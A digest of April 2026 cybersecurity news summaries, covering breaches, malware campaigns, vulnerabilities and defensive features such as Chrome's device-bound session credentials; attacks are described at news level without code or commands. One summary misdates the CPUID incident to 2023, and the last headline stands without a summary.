Rockstar Games experienced a data breach on April 14, 2026, when the hacking group ShinyHunters exploited a third-party integration with Anodot to access its Snowflake data warehouse, leaking over 78.6 million records. The attackers extracted authentication tokens from Anodot, allowing them to impersonate internal services. No vulnerabilities in Snowflake were exploited. The leaked data included analytics on GTA Online and Red Dead Online, but no sensitive player information was compromised. Security teams are advised to audit SaaS integrations and monitor for anomalies.
2026-04-14 | TechRadar: Rockstar hackers publish 78.6 million stolen records — but many of us will be disappointed
Hackers from the ShinyHunters group have leaked over 78.6 million records stolen from Rockstar Games, primarily consisting of business and financial data rather than game-related information. The breach, linked to an Anodot supply chain attack, exposed internal analytics, game economy data, and customer support metrics. Rockstar confirmed the breach, stating the stolen data was non-material and had no significant impact on the organization or its players. The hackers threatened further leaks if demands were not met.
2026-04-14 | Security Affairs: ShinyHunters claim the hack of Rockstar Games breach and started leaking data
An 8.1GB data leak linked to Rockstar Games has emerged, reportedly shared by the cybercrime group ShinyHunters. The leaked data includes anti-cheat source code, player analytics, game assets, and financial information, allegedly obtained via a third-party cloud provider. Rockstar Games stated that only a limited amount of non-sensitive information was accessed and that core systems were not compromised. This incident highlights the rising threat of attacks targeting third-party cloud environments.
Gmail’s end-to-end encryption comes to mobile, no extra apps required
Date: 2026-04-10 | Source: Help Net Security
Google has introduced client-side encryption for Gmail on Android and iOS, enabling Enterprise Plus users with Assured Controls to send and receive encrypted messages without additional apps. This feature allows users to maintain compliance while accessing sensitive data on mobile devices. Encrypted messages appear as standard threads in Gmail, and recipients can access them via web browsers. Admins must enable mobile access for this feature in the Admin Console, while users can activate encryption by selecting a lock icon when composing messages.
Gmail’s end-to-end encryption comes to mobile, no extra apps required
2026-04-10 | CNET: Encrypted Emails Are Now Available for Some Gmail Phone App Enterprise Customers
Google has introduced end-to-end encryption (E2EE) for Gmail app users on iOS and Android, available exclusively to Enterprise Plus subscribers with Assured Controls or Assured Controls Plus. This feature allows users to send and receive encrypted emails directly within the app, enhancing data security and compliance. Recipients can read and reply to encrypted emails even if they do not use Gmail. Administrators must enable this feature in the Admin Console for users to access it.
2026-04-10 | CSO Online: Google adds end-to-end Gmail encryption to Android, iOS devices for enterprises
Google has extended end-to-end encryption for Gmail to Android and iOS devices, enhancing client-side encryption (CSE) for enterprise users. Gartner analyst Avivah Litan noted that this update is significant amid concerns over WhatsApp's encryption, as it provides verifiable customer-managed keys, ensuring that Google cannot access encrypted content. This move addresses issues highlighted in a January 2026 lawsuit against Meta concerning internal access to customer encrypted message data.
2026-04-11 | Cyber Security News: Google Launches Gmail End-to-End Encryption for Android and iOS Users
Google has launched End-to-End Encryption (E2EE) for its Gmail app on Android and iOS, enabling organizations to manage sensitive data securely from mobile devices. This feature ensures compliance with data sovereignty regulations and allows users to compose and read encrypted messages natively without third-party apps. Administrators must enable mobile clients in the Workspace Admin Console. The update is available now for Enterprise Plus accounts, supporting seamless communication with non-Gmail users.
CPUID Website Compromised to Deliver Weaponized HWMonitor and CPU-Z Tools
Date: 2026-04-10 | Source: Cyber Security News
The cpuid.com website has been compromised, delivering trojanized versions of HWMonitor 1.63 and CPU-Z since early April 2026. Users reported downloading a malicious file named HWiNFO_Monitor_Setup.exe instead of the expected hwmonitor_1.63.exe. The malware employs DLL hijacking and in-memory execution to evade detection. Download links are currently returning 404 errors, and CPUID is investigating. Users are advised not to download from cpuid.com and to scan for cryptbase.dll if downloaded after April 3, 2026.
CPUID Website Compromised to Deliver Weaponized HWMonitor and CPU-Z Tools
2026-04-10 | The Register: CPUID site hijacked to serve malware instead of HWMonitor downloads
The CPUID website was compromised for approximately six hours between April 9 and April 10, 2023, redirecting users attempting to download HWMonitor and CPU-Z to malicious installers. The breach involved a compromised backend component, not the software builds themselves. The malware targeted 64-bit HWMonitor users, utilizing a fake CRYPTBASE.dll to connect to a command-and-control server and execute additional payloads, including attempts to access browser data. CPUID has since resolved the issue.
2026-04-12 | The Hacker News: CPUID Breach Distributes STX RAT via Trojanized CPU-Z and HWMonitor Downloads
Unknown threat actors compromised CPUID from April 9, 15:00 UTC, to April 10, 10:00 UTC, serving malicious executables for CPU-Z and HWMonitor. The breach involved a secondary API compromise, leading to the distribution of STX RAT via trojanized software. The malicious DLL, named 'CRYPTBASE.dll', executed additional payloads and performed anti-sandbox checks. Over 150 victims, including individuals and organizations in various sectors, were identified, primarily in Brazil, Russia, and China.
2026-04-13 | Risky.Biz: Risky Bulletin: France takes first steps to ditch Windows for Linux
The CPUID software project was hacked, leading to malware being added to the CPU-Z and HWMonitor download links for six hours. Security researchers linked the breach to a known cybercrime group distributing malware-laced apps. OpenAI rotated its notarization certificate after the Axios supply chain attack, while the Silent ransom group leaked data from law firm Orrick, Herrington & Sutcliffe. Rockstar Games was also hacked again, facing extortion from the ShinyHunters group.
2026-04-13 | Security Affairs: CPUID watering hole attack spreads STX RAT malware
On April 9, 2026, the CPUID website was compromised, redirecting download links for CPU-Z and HWMonitor to malicious domains for approximately six hours. Attackers distributed STX RAT via trojanized installers containing a malicious DLL, enabling remote access. Kaspersky identified over 150 victims, primarily in Brazil, Russia, and China. The attack reused infrastructure from a previous campaign, leading to easier detection. Recommendations include checking DNS logs for signs of infection.
2026-04-13 | TechRadar: 'This is not your typical run-of-the-mill malware': CPUID download page hacked and tools replaced with links to malicious files
CPUID.com was compromised for about six hours between April 9 and April 10, serving malicious download links for legitimate software, including CPU-Z and HWMonitor. The malware, identified as a sophisticated Trojan, utilized DLL sideloading with a malicious DLL named 'CRYPTBASE.dll' for command and control connections. It evaded detection by 20 antivirus engines and was described as deeply trojanized and multi-staged. The website has since been secured, and the original files remain uncompromised.
2026-04-13 | Help Net Security: Hackers hijacked CPUID downloads, served STX RAT to victims
Hackers compromised CPUID's website for about six hours from April 9 to April 10, redirecting downloads to malicious links that served the STX RAT, a remote access trojan. The original signed files were not affected. The malware targets browser credentials, crypto-wallets, and FTP client credentials. Over 150 victims, including individuals and organizations in sectors like retail and telecommunications, were identified, primarily in Brazil, Russia, and China. Users are advised to check for malicious files and change compromised credentials.
Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure
Date: 2026-04-10 | Source: The Hacker News
A critical RCE vulnerability, CVE-2026-39987 (CVSS 9.3), in Marimo (Python notebook) was exploited within 10 hours of disclosure. It affects all versions up to 0.20.4, with a fix in 0.23.0. The flaw allows unauthenticated access to a full PTY shell via the /terminal/ws WebSocket endpoint, bypassing authentication. Sysdig observed exploitation attempts shortly after disclosure, including credential theft from a honeypot. This highlights the urgency for defenders to respond quickly to newly disclosed vulnerabilities.
Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure
2026-04-11 | Security Affairs: CVE-2026-39987: Marimo RCE exploited in hours after disclosure
A critical vulnerability in the open-source Python notebook tool Marimo, tracked as CVE-2026-39987, was exploited within 10 hours of its April 8, 2026 disclosure. The flaw allows pre-authenticated remote code execution, affecting versions up to 0.20.4, with version 0.23.0 addressing the issue. Attackers executed credential theft in under 3 minutes, highlighting rapid exploitation capabilities, potentially aided by AI. The advisory includes indicators of compromise for affected systems.
2026-04-13 | CSO Online: Critical flaw in Marimo Python notebook exploited within 10 hours of disclosure
A critical pre-authentication remote code execution vulnerability (CVE-2026-39987) in Marimo, an open-source Python notebook platform by CoreWeave, was exploited within 10 hours of its disclosure. With a severity score of 9.3, it affects all versions prior to 0.23.0. The exploit requires no login or stolen credentials; an attacker can gain complete control by sending a single connection request to a specific endpoint on an exposed Marimo server.
2026-04-13 | Cyber Security News: Marimo RCE Vulnerability Exploited in the Within 10 Hours of Disclosure
A critical RCE vulnerability (CVE-2026-39987) in the Marimo Python notebook platform was exploited within 10 hours of disclosure, allowing unauthenticated attackers to gain a pseudo-terminal shell via the /terminal/ws WebSocket endpoint. The flaw, with a CVSS score of 9.3, enables command execution with Marimo's privileges. Attackers exfiltrated sensitive AWS credentials shortly after gaining access. Security teams are advised to update to version 0.23.0, restrict access, audit environment variables, and rotate compromised credentials.
Protecting Cookies with Device Bound Session Credentials
Date: 2026-04-09 | Source: Google Online Security
Device Bound Session Credentials (DBSC) is now publicly available for Windows users on Chrome 146, with macOS support coming soon. DBSC aims to combat session theft by cryptographically binding authentication sessions to specific devices using hardware-backed security modules. This proactive approach prevents exfiltrated cookies from being used, as they quickly expire without the private key. DBSC maintains user privacy and is designed as an open web standard, with ongoing improvements planned for enterprise environments.
Protecting Cookies with Device Bound Session Credentials
2026-04-10 | The Hacker News: Google Rolls Out DBSC in Chrome 146 to Block Session Theft on Windows
Google has launched Device Bound Session Credentials (DBSC) for Chrome 146 on Windows to combat session theft. This feature ties authentication sessions to specific devices using hardware-backed security modules, making stolen cookies useless. DBSC generates a unique public/private key pair, ensuring that even if cookies are exfiltrated, they quickly expire. Google reports a significant reduction in session theft since the feature's introduction and plans to expand DBSC to more devices and enhance its capabilities for enterprise environments.
2026-04-10 | Help Net Security: To counter cookie theft, Chrome ships device-bound session credentials
Google's Device Bound Session Credentials (DBSC) is now publicly available in Chrome 146 for Windows, with macOS support forthcoming. DBSC binds authentication sessions to specific devices using hardware-backed security modules, generating unique cryptographic keys. This prevents cookie theft by ensuring that stolen cookies expire quickly and cannot be renewed without the private key. Google has observed a reduction in session theft during trials. Future developments include federated identity support, advanced registration, and broader device compatibility.
2026-04-10 | TechRadar: Google Chrome rolls out a new tool to try and stop infostealer malware in its tracks
Google has introduced Device Bound Session Credentials (DBSC) in Chrome 146 for Windows, enhancing security against infostealer malware by cryptographically binding session cookies to the user's device. This feature utilizes hardware-backed security modules to generate a unique key pair, preventing key theft and rendering exfiltrated cookies useless. A macOS rollout is expected soon. The implementation aims to significantly reduce session theft, which has become a major target for cybercriminals using infostealing malware.
2026-04-11 | Cyber Security News: Google Unveils Device-Bound Chrome Sessions in Anti-Cookie-Theft Move
Google has rolled out Device Bound Session Credentials (DBSC) for Windows users on Chrome 146 to combat session hijacking. This feature ties authentication sessions to a user's physical device using hardware-backed security modules, generating unique public-private key pairs. If session cookies are stolen, they quickly expire without the physical key. DBSC, developed with the W3C and Microsoft, aims to enhance security in federated identity and SSO environments, while maintaining user privacy.
2026-04-11 | Hack Read: Google Chrome Update Disrupts Infostealer Cookie Theft
Google has introduced Device Bound Session Credentials (DBSC) in Chrome 146 for Windows to combat session cookie theft by malware. This feature links login sessions to a computer's Trusted Platform Module (TPM), creating a unique key pair so that exfiltrated cookies cannot be reused on another device. Cookies are short-lived, reducing their utility if stolen. The update aims to enhance security against infostealers, which previously compromised sensitive data from organizations like the Pentagon and FBI. A macOS version is forthcoming.
FBI Extracts Suspect’s Deleted Signal Messages Saved in iPhone Notification Database
Date: 2026-04-09 | Source: 404 Media
The FBI extracted deleted Signal messages from a defendant's iPhone by accessing the push notification database, revealing incoming messages even after the app was removed. This occurred during a trial related to vandalism and violence at the ICE Prairieland Detention Facility in Texas. The case highlights the importance of adjusting notification settings in secure messaging apps to prevent unintended data exposure. All defendants were ultimately found guilty of multiple charges.
FBI Extracts Suspect’s Deleted Signal Messages Saved in iPhone Notification Database
2026-04-10 | Risky.Biz: Risky Bulletin: FBI extracted Signal chats from iPhone notifications logs
The FBI extracted deleted Signal messages from a suspect's iPhone using a new technique that accessed the phone's notification logs. This method was utilized in a case related to anti-ICE protests in Texas. In other incidents, the Los Angeles city attorney's office was hacked, and sensitive data was leaked, while a ransomware attack affected a major Dutch hospital software provider, ChipSoft, although its platform remained operational.
2026-04-10 | CNET: How to Make Sure Your Private Signal Messages Aren't Still Lurking on Your Phone
The FBI extracted deleted Signal messages from an iPhone's notification system during a trial related to a 2025 incident at the ICE Prairieland Detention Facility. Despite the app being removed and messages set to disappear, they remained retrievable due to the iPhone's internal database. Experts urge users to adjust Signal's notification settings to prevent message visibility in notifications, enhancing privacy and security. All nine defendants were found guilty of various charges.
2026-04-11 | Wired: Your Push Notifications Aren’t Safe From the FBI
The FBI accessed encrypted Signal messages from a defendant's iPhone via push notifications, despite the app being removed. This issue affects all apps with push notifications; users can adjust settings in Signal to hide message content. Meanwhile, the FBI's annual report revealed cybercrime losses exceeded $20 billion in 2025, with over half linked to cryptocurrency scams. Google expanded Gmail's end-to-end encryption to mobile apps for enterprise users, enhancing security for sensitive communications.
2026-04-11 | Hack Read: FBI Recovers Deleted Signal Messages Through iPhone Notifications
The FBI recovered deleted Signal messages from an iPhone in a Texas case involving Lynette Sharp, revealing a security loophole. The messages were retrieved from the iPhone's push notification database, despite Signal's end-to-end encryption. The FBI used Cellebrite to access incoming message previews stored by the phone's operating system. Users can enhance privacy by adjusting notification settings on their iPhones and within the Signal app to prevent message previews from being stored.
2026-04-13 | Security Affairs: iPhone forensics expose Signal messages after app removal in U.S. case
An FBI case in Texas revealed that Signal messages can be recovered from iPhones even after the app is uninstalled, challenging privacy assumptions. Forensic analysis showed that incoming messages were stored in Apple's push notification database, allowing recovery despite the app's deletion. Only incoming messages were retrievable, as outgoing messages do not leave such traces. This incident underscores that mobile operating systems retain data beyond user control, highlighting the limitations of perceived privacy in secure messaging apps.
Intent redirection vulnerability in third-party SDK exposed millions of Android wallets to potential risk
Date: 2026-04-09 | Source: Microsoft Security
A severe intent redirection vulnerability in the EngageSDK, affecting over 30 million Android crypto wallet installations, allows unauthorized access to private data. Detected during security research, the flaw was reported in April 2025 and resolved in version 5.2.1 released on November 3, 2025. Developers are urged to upgrade to this version. The vulnerability could lead to unauthorized data exposure and privilege escalation, highlighting risks associated with third-party SDKs in high-value applications.
Intent redirection vulnerability in third-party SDK exposed millions of Android wallets to potential risk
2026-04-09 | The Hacker News: EngageLab SDK Flaw Exposed 50M Android Users, Including 30M Crypto Wallet Installs
A vulnerability in the EngageLab SDK, affecting over 50 million Android users, including 30 million cryptocurrency wallet installations, was reported by Microsoft Defender. The flaw, identified as an intent redirection vulnerability in version 4.5.4, allowed unauthorized access to private data across apps on the same device. Although no exploitation was detected, developers are urged to update to version 5.2.1, released in November 2025, to mitigate risks associated with third-party SDK dependencies.
2026-04-10 | Security Affairs: EngageLab SDK flaw opens door to private data on 50M Android devices
A critical flaw in EngageLab SDK exposed private data on up to 50 million Android devices, including over 30 million crypto wallets. The vulnerability allowed apps to bypass Android's sandbox protections via intent redirection, enabling unauthorized access to sensitive data. Microsoft reported the issue in April 2025, leading to a fix in version 5.2.1 released on November 3, 2025. Developers are advised to review merged Android manifests to ensure security when using third-party SDKs.
2026-04-10 | TechRadar: Microsoft warns worrying security flaw exposed over 50 million Android users, says 'user credentials and financial data were exposed to risk'
Microsoft identified a vulnerability in the EngageLab SDK affecting 50 million Android devices, allowing apps to bypass the security sandbox and access private data. At least 30 million installations were linked to cryptocurrency apps. The flaw, discovered in April 2025 and patched in November 2025 (version 5.2.1), has not been exploited in real-world attacks. Developers are urged to update the SDK to mitigate risks associated with third-party dependencies in app security.
2026-04-10 | Cyber Security News: EngageSDK Vulnerability Exposes Millions of Crypto Wallet Users to Cyberattacks
A vulnerability in the EngageSDK, affecting over 30 million cryptocurrency wallet users, allows malicious apps to access private user data due to an intent redirection flaw. Identified by Microsoft in April 2025, the issue resides in an exported activity, MTCommonActivity, which was overlooked by developers. EngageLab released a fix in version 5.2.1 on November 3, 2025. Users are advised to upgrade immediately, and Android has implemented automatic mitigations for previously installed vulnerable apps.
Atomic Stealer MacOS ClickFix Attack Bypasses Apple Security Warnings
Date: 2026-04-09 | Source: Infosecurity Magazine
A malware campaign targeting macOS systems has evolved to use a ClickFix attack that exploits Script Editor instead of Terminal for execution. Identified by Jamf Threat Labs, the Atomic Stealer (AMOS) infostealer bypasses Apple’s security warnings introduced in the macOS 26.4 update. Users are misled into executing malicious commands under the guise of reclaiming disk space. Recommendations for network administrators include restricting run dialog use, blocking malicious executables, and preventing access to harmful websites.
Atomic Stealer MacOS ClickFix Attack Bypasses Apple Security Warnings
2026-04-09 | CSO Online: New ClickFix variant bypasses Apple safeguards with one-click script execution
A new variant of ClickFix malware has emerged, enabling threat actors to bypass Apple safeguards through a one-click script execution method. Researchers at Jamf Threat Labs discovered that this macOS campaign uses the applescript:// URL scheme to launch Apple's Script Editor directly from the browser, preloaded with malicious code. This approach eliminates the need for user interaction with Terminal, facilitating the delivery of Atomic Stealer payloads more efficiently.
2026-04-09 | Cyber Security News: New ClickFix Campaign Uses macOS Script Editor to Deliver Atomic Stealer
A new ClickFix campaign targets macOS users by using Script Editor to deliver the Atomic Stealer infostealer, bypassing Terminal protections introduced in macOS 26.4. Attackers exploit a fake Apple-themed webpage to prompt users to execute a script that downloads and runs malware in memory. The campaign utilizes obfuscation techniques and indicators of compromise include domains like dryvecar.com. Users are advised to avoid executing scripts from external sources and to keep macOS updated for security.
2026-04-09 | TechRadar: Mac users beware — experts say this attack 'stood out immediately' by making a major change to try spread malware
Hackers have revived ClickFix attacks on macOS, utilizing a new method that exploits Script Editor via a URL scheme to deliver the Atomic Stealer malware. Security researchers from Jamf Threat Labs observed a campaign where victims are lured to a website promising to "reclaim disk space." By clicking an "Execute" button, users inadvertently open Script Editor, which runs a pre-filled script to exfiltrate sensitive data, including passwords and cryptocurrency information.
2026-04-10 | Help Net Security: ClickFix campaign delivers Mac malware via fake Apple page
Security researchers at Jamf have identified a ClickFix-style attack targeting Mac users through a fake Apple webpage that claims to help reclaim disk space. This social engineering tactic prompts users to execute malicious commands via Script Editor. If users ignore warnings and run the script, it downloads an Atomic Stealer variant, capable of stealing sensitive data from Keychain, browsers, and cryptocurrency wallets. Jamf has provided indicators of compromise for this malware campaign.
2026-04-10 | Malwarebytes Labs: ClickFix finds a new way to infect Macs
ClickFix has evolved its tactics to infect Macs by using the applescript:// URL scheme to auto-open Script Editor, replacing the previous method of pasting commands into Terminal. This social engineering technique tricks users into executing a script that downloads Atomic Stealer malware. Users are advised to be cautious, avoid running untrusted scripts, and verify instructions independently. Keeping macOS updated and using real-time anti-malware solutions are recommended for protection against such threats.
Hackers Claim to Have Stolen 10 Petabytes of Data from China’s Tianjin Supercomputer Center
Date: 2026-04-09 | Source: Cyber Security News
Hackers claim to have stolen over 10 petabytes of data from China's Tianjin Supercomputer Center, a key facility supporting defense and industrial sectors. The breach allegedly includes sensitive defense documents and missile design data. Access reportedly began through a compromised VPN, with a botnet extracting data over six months. While the full scope remains unverified, the incident raises significant national security concerns and highlights vulnerabilities in critical computing infrastructure.
Hackers Claim to Have Stolen 10 Petabytes of Data from China’s Tianjin Supercomputer Center
2026-04-09 | Security Affairs: The alleged breach of China’s National Supercomputing Center can have serious geopolitical consequences
A hacker allegedly breached China’s National Supercomputing Center, exfiltrating over 10 petabytes of sensitive military and aerospace data, risking national security. The group “FlamingChina” claims to have accessed data from major organizations, including Aviation Industry Corporation of China. The breach, reportedly achieved via a compromised VPN, could escalate geopolitical tensions and erode trust in Chinese infrastructure. Cybersecurity experts believe the data is genuine, highlighting systemic weaknesses in China’s defenses.
2026-04-09 | Times Now: How Hackers Breached Supercomputer In China To Steal Fighter Jet And War Simulation Data
Hackers breached a government supercomputer in China, stealing sensitive information, including classified defense documents, fighter jet research, advanced war simulation data, and missile schematics. This incident is reported as one of the largest data breaches in the country, highlighting the growing threat posed by cybercriminals to national security.
2026-04-09 | TechRadar: ‘FlamingChina’ hacker claims to have stolen over 10 petabytes of advanced military data from China’s National Supercomputing Center in possibly the biggest hack of all time
An individual or group named 'FlamingChina' claims to have stolen over 10 petabytes of sensitive military data from China’s National Supercomputing Center, potentially the largest hack to date. The breach, which remains unverified, includes data from organizations like AVIC and COMAC, featuring military simulations. The hacker reportedly accessed the system via a compromised VPN and extracted data over six months using a botnet. The dataset is now for sale in cryptocurrency, raising concerns about national security implications.
2026-04-09 | Security Magazine: Chinese Supercomputer Allegedly Hacked, 10 Petabytes of Data Stolen
The National Supercomputing Center (NSCC) in Tianjin, China, allegedly suffered a breach resulting in the theft of over 10 petabytes of sensitive data, including classified defense documents and missile schematics. Unauthorized access was reportedly achieved through a compromised VPN, followed by a botnet deployment for data exfiltration over six months. The hacker is offering previews for thousands and full access for hundreds of thousands in cryptocurrency.
8-K - Bitcoin Depot Inc. (0001901799) [Material]
Date: 2026-04-08 | Source: U.S. Securities and Exchange Commission (Filings)
On March 23, 2026, Bitcoin Depot Inc. detected unauthorized access to its IT systems, leading to the transfer of approximately 50.903 Bitcoin (valued at $3.665 million) from its wallets. The company activated incident response protocols, engaged cybersecurity experts, and notified law enforcement. The incident is believed to be contained within the corporate environment, with no evidence of customer data being accessed. The investigation is ongoing, and while a preliminary loss estimate of $3.665 million has been recorded, the full impact remains undetermined.
8-K - Bitcoin Depot Inc. (0001901799) [Material]
2026-04-09 | Recorded Future: Cryptocurrency ATM giant Bitcoin Depot reports $3.6 million stolen in cyberattack
On March 23, Bitcoin Depot reported a cyberattack resulting in the theft of over $3.6 million, with approximately 50.903 Bitcoin transferred from company-controlled wallets. The company stated that the incident was contained to its corporate environment and did not affect customer platforms or data. Outside cybersecurity experts are investigating, and law enforcement has been notified. Bitcoin Depot has not determined the full impact of the incident, which may change as the investigation continues.
2026-04-09 | Infosecurity Magazine: Bitcoin Depot Reports $3.6m Crypto Theft After System Breach
A cyber-attack on Bitcoin Depot's systems resulted in the theft of over 50 Bitcoin, valued at approximately $3.66 million, detected on March 23. Attackers accessed credentials linked to digital asset settlement accounts, transferring the Bitcoin before being blocked. The breach was contained within corporate systems, with no impact on customer data. Bitcoin Depot initiated incident response protocols and notified law enforcement. The investigation is ongoing, with potential reputational and financial repercussions.
2026-04-10 | Security Affairs: Bitcoin Depot hack leads to $3.6M Bitcoin theft via stolen credentials
Hackers breached Bitcoin Depot on March 23, 2026, stealing login credentials and transferring approximately 50.9 BTC, valued at $3.6 million, from the company's wallets. The breach was reported in a FORM 8-K filed with the SEC, stating that the unauthorized access was contained to corporate systems and did not affect customer data. Bitcoin Depot activated incident response protocols and is investigating with external cybersecurity experts. The company estimates potential losses and has insurance coverage, though recovery is uncertain.
Hack-for-hire spyware campaign targets journalists in Middle East, North Africa
Date: 2026-04-08 | Source: Cyberscoop
A hack-for-hire spyware campaign, linked to the Indian government, targeted journalists in the Middle East and North Africa using Android ProSpy malware. Researchers from Access Now, Lookout, and SMEX uncovered a spearphishing campaign active since 2022, affecting civil society members and possibly government officials. Victims reported receiving suspicious links. The Committee to Protect Journalists condemned the campaign, highlighting threats to journalists' safety and their sources. ESET previously identified ProSpy malware in the UAE.
2026-04-08 | TechCrunch: Hack-for-hire group caught targeting Android devices and iCloud backups
A hack-for-hire group, codenamed BITTER, has been identified targeting journalists, activists, and officials in the Middle East and North Africa using phishing attacks to access iCloud backups and deploy Android spyware. The group is suspected to have ties to the Indian government and may be linked to RebSec Solutions. The attacks involved tricking iPhone users into revealing Apple ID credentials and using spyware like ProSpy on Android, disguised as popular apps.
2026-04-09 | The Hacker News: Bitter-Linked Hack-for-Hire Campaign Targets Journalists Across MENA Region
A hack-for-hire campaign linked to the Indian government targeted journalists and activists in the MENA region, with notable attacks on Egyptian journalists Mostafa Al-A'sar and Ahmed Eltantawy. Spear-phishing attempts aimed to compromise their Apple and Google accounts using fake pages. The campaign, operational from 2023 to 2025, also involved phishing via iMessage and WhatsApp. While no accounts were breached, one Lebanese journalist's Apple account was compromised. The operation may indicate broader surveillance efforts.
2026-04-09 | Infosecurity Magazine: Middle East Hack-for-Hire Operation Traced to South Asian Cyber Espionage Group
A spear-phishing campaign targeting civil society figures in the Middle East, including journalists Mostafa Al-A'sar and Ahmed Eltantawy, was linked to a South Asian cyber espionage group known as Bitter. Detected by Access Now in August 2025, the campaign utilized Android malware and aimed to compromise Apple and Google accounts. Attackers impersonated legitimate services and used fake profiles to deliver the ProSpy/ToSpy malware, with the campaign active from October 2023 to January 2024.
2026-04-10 | Cyber Security News: Hackers Impersonate Secure Messaging Apps to Deploy ProSpy in Middle East Espionage Attacks
A targeted mobile espionage campaign in the Middle East has been using fake secure messaging apps to deploy Android spyware named ProSpy since at least 2022. The operation, linked to the BITTER APT group, has affected journalists and activists across several countries, including Egypt and the UAE. ProSpy collects sensitive data and is delivered via spearphishing links leading to trojanized APKs. Users are advised to avoid unofficial app downloads and be cautious of unexpected links.
2026-04-13 | Hack Read: BITTER APT Uses Signal, Google, and Zoom Lures to Spread ProSpy Spyware
An ongoing spying operation by the BITTER APT targets journalists and opposition politicians in the Middle East using spearphishing tactics. Hackers lure victims via LinkedIn and iMessage, directing them to fake login pages for apps like Zoom and Google. Victims linking their Signal accounts via malicious QR codes expose private chats. The spyware ProSpy, developed in Kotlin, monitors user activity and steals sensitive data. This campaign marks BITTER's first targeting of activists, indicating a potential hack-for-hire motive.
Hackers Actively Attacking Adobe Reader Users Using Sophisticated 0-Day Exploit
Date: 2026-04-08 | Source: Cyber Security News
A zero-day exploit targeting Adobe Reader users has been detected; it steals sensitive data and fingerprints the system with no interaction beyond opening the PDF. The exploit, embedded in a malicious PDF, evades antivirus detection and abuses Reader APIs to read local files and send the data to an attacker-controlled server. It can also deliver additional payloads for remote code execution. No patch is currently available. Users are advised to avoid unknown PDFs and to monitor network traffic for suspicious activity.
2026-04-09 | Sophos: Adobe Reader zero-day vulnerability in active exploitation
On April 7, 2026, a zero-day vulnerability in Adobe Reader was reported, exploited since December 2025. It allows attackers to execute privileged Acrobat APIs via malicious PDFs, enabling data theft and remote code execution. Targeted attacks are linked to the Russian oil and gas sector. Recommendations include monitoring for Adobe patches, scanning PDF attachments, and user training. Threat indicators include specific MD5, SHA1, and SHA256 hashes, along with associated domains and IP addresses.
2026-04-09 | The Hacker News: Adobe Reader Zero-Day Exploited via Malicious PDFs Since December 2025
Threat actors have exploited a zero-day vulnerability in Adobe Reader via malicious PDFs since December 2025. The exploit, detailed by EXPMON's Haifei Li, uses social engineering tactics to lure users. The PDF ("Invoice540.pdf") executes obfuscated JavaScript to harvest data and potentially enable remote code execution (RCE) and sandbox escape (SBX). It abuses unpatched vulnerabilities in Adobe Reader, exfiltrating data to a remote server. The security community is advised to remain vigilant.
2026-04-09 | Help Net Security: Acrobat Reader zero-day exploited in the wild for many months
A zero-day vulnerability in Adobe Acrobat Reader has been exploited since November 2025, discovered by researcher Haifei Li. The exploit is embedded in PDF files, executing obfuscated JavaScript that collects system information and communicates with an attacker-controlled server. The targeted victims appear to be Russian-speaking organizations in government and energy sectors. Users are advised to avoid untrusted PDFs and security teams should block specific IP addresses and monitor endpoint activities until a fix is released.
2026-04-09 | The Register: Months-old Adobe Reader zero-day uses PDFs to size up targets
Hackers have exploited a zero-day vulnerability in Adobe Acrobat Reader for months, using malicious PDFs to profile targets without user interaction. The exploit employs obfuscated JavaScript to gather system information and send it to the attacker's servers. If a target is deemed valuable, a second-stage payload may be delivered, potentially leading to remote code execution. The campaign, active since late 2025, has no CVE or patch available, leaving users vulnerable, especially when opening PDFs from unknown sources.
2026-04-09 | Times Now: How A Simple PDF File Can Put Your Computer At Hacking Risk
A simple PDF file can expose computers to hacking risks, potentially linked to targeted phishing campaigns. The article emphasizes that anyone could fall victim to these attacks. Currently, there is no patch available, making user awareness the primary defense against this threat.
2026-04-09 | Hack Read: Adobe Reader Zero-Day Exploited to Steal Data via Malicious PDFs
Hackers are exploiting a zero-day vulnerability in Adobe Reader, discovered by Haifei Li, since November 2025. The attack activates upon opening a malicious PDF, such as "Invoice540.pdf," running obfuscated JavaScript to hijack APIs for data theft. The attackers target specific groups, using Russian language lures related to the oil and gas industry. Adobe was notified on April 7, 2026, but no patch is available. Users are advised to avoid unknown PDFs and network managers should block traffic mentioning Adobe Synchronizer.
2026-04-09 | Security Affairs: Malicious PDF reveals active Adobe Reader zero-day in the wild
Hackers have exploited an unpatched Adobe Reader zero-day for months, delivering a sophisticated PDF exploit. Discovered by researcher Haifei Li, the malicious PDF was flagged on March 26, 2026, with low antivirus detection. The exploit uses Adobe Reader's JavaScript engine to collect sensitive data and potentially execute remote code. Documents in the campaign feature Russian language lures related to the oil and gas industry. Ongoing analysis is needed to understand the exploit's full impact.
2026-04-09 | CSO Online: Hackers have been exploiting an unpatched Adobe Reader vulnerability for months
Hackers have been exploiting an unpatched vulnerability in Adobe Reader for up to four months, using malware to fingerprint computers and gather information for data theft and further attacks. Security researcher Haifei Li reported that his exploit monitor, EXPMON, detected an initial exploit targeting a Reader API vulnerability. This ongoing exploitation highlights the risks associated with the widespread use of Adobe Reader and the need for timely updates to mitigate such threats.
2026-04-10 | TechRadar: Adobe Reader users beware — experts flag months-old security flaw using booby-trapped PDFs to scope out victims
Adobe Reader is currently vulnerable to a zero-day exploit that allows hackers to steal sensitive data and potentially take full control of affected devices. Discovered by researcher Haifei Li, this exploit has been active since December 2025 and requires only the opening of a malicious PDF. Targeting individuals in the Russian oil and gas sector, users are advised to avoid untrusted PDFs until a patch is released. Network defenders can mitigate risks by blocking specific HTTP/HTTPS traffic.
2026-04-12 | The Hacker News: Adobe Patches Actively Exploited Acrobat Reader Flaw CVE-2026-34621
Adobe has released emergency updates to address a critical security flaw in Acrobat Reader, identified as CVE-2026-34621, with a CVSS score of 8.6. This vulnerability, related to prototype pollution, allows attackers to execute malicious code on affected systems. It impacts Acrobat DC and Reader DC versions 26.001.21367 and earlier, and Acrobat 2024 versions 24.001.30356 and earlier. Adobe confirmed active exploitation of this flaw, which may have been occurring since December 2025.
2026-04-12 | Security Affairs: Adobe fixes actively exploited Acrobat Reader flaw CVE-2026-34621
Adobe has released emergency updates for Acrobat Reader to address the critical vulnerability CVE-2026-34621, which is actively exploited to execute malicious code. The flaw, rated CVSS 8.6, involves improperly controlled modification of object prototype attributes, allowing arbitrary code execution. Affected versions include Acrobat DC 26.001.21367 and earlier, and Acrobat 2024 Classic 24.001.30356 and earlier on Windows and macOS. Prompt patching is essential to mitigate risks.
2026-04-13 | Cyber Security News: Adobe Patches Acrobat Reader 0-Day Vulnerability Exploited in the Wild
